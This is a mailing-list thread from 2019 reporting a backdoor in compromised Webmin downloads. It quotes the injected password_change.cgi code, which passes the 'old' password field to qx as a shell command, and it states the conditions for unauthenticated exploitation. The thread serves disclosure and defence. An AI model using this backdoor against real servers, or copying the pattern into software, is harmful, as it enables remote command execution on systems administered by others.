Re: [webmin-l] Compromised Downloads

[Adam H. <ad...@gm...>]

To clarify my last email, you can run it without any auth cookie, and use
any username and "old" password. The "new" passwords have to match so it
gets that far, and passwd_mode=2 has to be set in miniserver.conf.

On Sat, Aug 17, 2019 at 5:47 PM Adam Hostetler <ad...@gm...> wrote:

> From my testing you can exploit it without knowing the password or even a
> username
>
> On Sat, Aug 17, 2019 at 5:35 PM Jamie Cameron <jca...@we...> wrote:
>
>> Thanks, I'm looking into this now. I'm guessing off hand that it's not
>> remotely exploitable without an existing login since the password change
>> cgi can't be run unless your already logged in.
>>
>> On Aug 17, 2019 1:29 PM, Adam Hostetler <ad...@gm...> wrote:
>>
>> I believe the downloads hosted by source forge are compromised. They
>> contain a backdoor in the password_change.cgi, this is related to the
>> "0day" a few days ago. The code does not appear in the current github repo
>> nor in any commits in the past.
>>
>> Backdoor code:
>> if ($wuser) {
>>         # Update Webmin user's password
>>         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
>>         $enc eq $wuser->{'pass'} ||
>> &pass_error($text{'password_eold'},qx/$in{'old'}/);
>>         $perr = &acl::check_password_restrictions($in{'user'},
>> $in{'new1'});
>>         $perr && &pass_error(&text('password_enewpass', $perr));
>>         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
>>
>> "old" password is passed to qx, which executes it as a system command
>>
>> See
>> https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_code_execution_for_webmin/
>>
>>
>> -
>> Forwarded by the Webmin mailing list at
>> web...@li...
>> To remove yourself from this list, go to
>> http://lists.sourceforge.net/lists/listinfo/webadmin-list
>>
>